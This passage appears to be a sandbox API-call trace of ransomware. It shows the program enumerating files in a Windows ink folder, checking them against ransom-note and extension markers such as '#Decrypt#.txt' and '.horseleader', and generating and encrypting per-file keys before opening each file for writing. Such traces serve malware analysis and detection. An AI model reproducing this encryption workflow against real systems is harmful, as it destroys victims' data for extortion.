ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0234.152] lstrcmpiW (lpString1="hwrusash.dat", lpString2="Windows") returned -1 [0234.152] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned 67 [0234.152] StrStrIW (lpFirst="hwrusash.dat", lpSrch=".horseleader") returned 0x0 [0234.152] lstrcmpW (lpString1="hwrusash.dat", lpString2="#Decrypt#.txt") returned 1 [0234.152] lstrcmpW (lpString1="hwrusash.dat", lpString2="_uninstalling_.png") returned 1 [0234.152] lstrlenW (lpString=".testttjffg") returned 11 [0234.152] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", lpSrch=".testttjffg") returned 0x0 [0234.152] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.153] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0234.153] lstrcmpiW (lpString1="InkDiv.dll", lpString2="Windows") returned -1 [0234.153] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned 65 [0234.153] StrStrIW (lpFirst="InkDiv.dll", lpSrch=".horseleader") returned 0x0 [0234.153] lstrcmpW (lpString1="InkDiv.dll", lpString2="#Decrypt#.txt") returned 1 [0234.153] lstrcmpW (lpString1="InkDiv.dll", lpString2="_uninstalling_.png") returned 1 [0234.153] lstrlenW (lpString=".testttjffg") returned 11 [0234.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll", lpSrch=".testttjffg") returned 0x0 [0234.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.154] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.154] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0234.154] lstrcmpiW (lpString1="InkObj.dll", lpString2="Windows") returned -1 [0234.154] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned 65 [0234.154] StrStrIW (lpFirst="InkObj.dll", lpSrch=".horseleader") returned 0x0 [0234.154] lstrcmpW (lpString1="InkObj.dll", lpString2="#Decrypt#.txt") returned 1 [0234.154] lstrcmpW (lpString1="InkObj.dll", lpString2="_uninstalling_.png") returned 1 [0234.154] lstrlenW (lpString=".testttjffg") returned 11 [0234.154] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll", lpSrch=".testttjffg") returned 0x0 [0234.154] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.154] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.155] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0234.155] lstrcmpiW (lpString1="InkWatson.exe", lpString2="Windows") returned -1 [0234.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned 68 [0234.155] StrStrIW (lpFirst="InkWatson.exe", lpSrch=".horseleader") returned 0x0 [0234.155] lstrcmpW (lpString1="InkWatson.exe", lpString2="#Decrypt#.txt") returned 1 [0234.155] lstrcmpW (lpString1="InkWatson.exe", lpString2="_uninstalling_.png") returned 1 [0234.155] lstrlenW (lpString=".testttjffg") returned 11 [0234.155] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe", lpSrch=".testttjffg") returned 0x0 [0234.155] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.155] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkwatson.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.155] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0234.155] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="Windows") returned -1 [0234.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned 79 [0234.155] StrStrIW (lpFirst="InputPersonalization.exe", lpSrch=".horseleader") returned 0x0 [0234.155] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="#Decrypt#.txt") returned 1 [0234.156] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="_uninstalling_.png") returned 1 [0234.156] lstrlenW (lpString=".testttjffg") returned 11 [0234.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe", lpSrch=".testttjffg") returned 0x0 [0234.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.156] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0234.156] lstrcmpiW (lpString1="ipscat.xml", lpString2="Windows") returned -1 [0234.156] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned 65 [0234.156] StrStrIW (lpFirst="ipscat.xml", lpSrch=".horseleader") returned 0x0 [0234.156] lstrcmpW (lpString1="ipscat.xml", lpString2="#Decrypt#.txt") returned 1 [0234.156] lstrcmpW (lpString1="ipscat.xml", lpString2="_uninstalling_.png") returned 1 [0234.156] lstrlenW (lpString=".testttjffg") returned 11 [0234.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpSrch=".testttjffg") returned 0x0 [0234.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.157] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0234.157] lstrcmpiW (lpString1="ipschs.xml", lpString2="Windows") returned -1 [0234.157] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned 65 [0234.157] StrStrIW (lpFirst="ipschs.xml", lpSrch=".horseleader") returned 0x0 [0234.157] lstrcmpW (lpString1="ipschs.xml", lpString2="#Decrypt#.txt") returned 1 [0234.157] lstrcmpW (lpString1="ipschs.xml", lpString2="_uninstalling_.png") returned 1 [0234.157] lstrlenW (lpString=".testttjffg") returned 11 [0234.157] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpSrch=".testttjffg") returned 0x0 [0234.157] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.157] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.158] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0234.158] lstrcmpiW (lpString1="ipscht.xml", lpString2="Windows") returned -1 [0234.158] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned 65 [0234.158] StrStrIW (lpFirst="ipscht.xml", lpSrch=".horseleader") returned 0x0 [0234.158] lstrcmpW (lpString1="ipscht.xml", lpString2="#Decrypt#.txt") returned 1 [0234.158] lstrcmpW (lpString1="ipscht.xml", lpString2="_uninstalling_.png") returned 1 [0234.158] lstrlenW (lpString=".testttjffg") returned 11 [0234.158] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpSrch=".testttjffg") returned 0x0 [0234.158] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.158] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.159] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0234.159] lstrcmpiW (lpString1="ipscsy.xml", lpString2="Windows") returned -1 [0234.159] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 65 [0234.160] StrStrIW (lpFirst="ipscsy.xml", lpSrch=".horseleader") returned 0x0 [0234.160] lstrcmpW (lpString1="ipscsy.xml", lpString2="#Decrypt#.txt") returned 1 [0234.160] lstrcmpW (lpString1="ipscsy.xml", lpString2="_uninstalling_.png") returned 1 [0234.160] lstrlenW (lpString=".testttjffg") returned 11 [0234.160] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpSrch=".testttjffg") returned 0x0 [0234.160] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.160] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.160] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0234.160] lstrcmpiW (lpString1="ipsdan.xml", lpString2="Windows") returned -1 [0234.160] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 65 [0234.160] StrStrIW (lpFirst="ipsdan.xml", lpSrch=".horseleader") returned 0x0 [0234.160] lstrcmpW (lpString1="ipsdan.xml", lpString2="#Decrypt#.txt") returned 1 [0234.160] lstrcmpW (lpString1="ipsdan.xml", lpString2="_uninstalling_.png") returned 1 [0234.160] lstrlenW (lpString=".testttjffg") returned 11 [0234.160] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpSrch=".testttjffg") returned 0x0 [0234.160] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.160] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.161] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0234.161] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="Windows") returned -1 [0234.161] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 65 [0234.161] StrStrIW (lpFirst="ipsdeu.xml", lpSrch=".horseleader") returned 0x0 [0234.161] lstrcmpW (lpString1="ipsdeu.xml", lpString2="#Decrypt#.txt") returned 1 [0234.161] lstrcmpW (lpString1="ipsdeu.xml", lpString2="_uninstalling_.png") returned 1 [0234.161] lstrlenW (lpString=".testttjffg") returned 11 [0234.161] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpSrch=".testttjffg") returned 0x0 [0234.161] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.161] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.161] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0234.162] lstrcmpiW (lpString1="ipsen.xml", lpString2="Windows") returned -1 [0234.162] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 64 [0234.162] StrStrIW (lpFirst="ipsen.xml", lpSrch=".horseleader") returned 0x0 [0234.162] lstrcmpW (lpString1="ipsen.xml", lpString2="#Decrypt#.txt") returned 1 [0234.162] lstrcmpW (lpString1="ipsen.xml", lpString2="_uninstalling_.png") returned 1 [0234.162] lstrlenW (lpString=".testttjffg") returned 11 [0234.162] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpSrch=".testttjffg") returned 0x0 [0234.162] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.162] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.163] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0234.163] lstrcmpiW (lpString1="ipsesp.xml", lpString2="Windows") returned -1 [0234.163] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 65 [0234.163] StrStrIW (lpFirst="ipsesp.xml", lpSrch=".horseleader") returned 0x0 [0234.163] lstrcmpW (lpString1="ipsesp.xml", lpString2="#Decrypt#.txt") returned 1 [0234.163] lstrcmpW (lpString1="ipsesp.xml", lpString2="_uninstalling_.png") returned 1 [0234.163] lstrlenW (lpString=".testttjffg") returned 11 [0234.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpSrch=".testttjffg") returned 0x0 [0234.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.164] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.164] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, 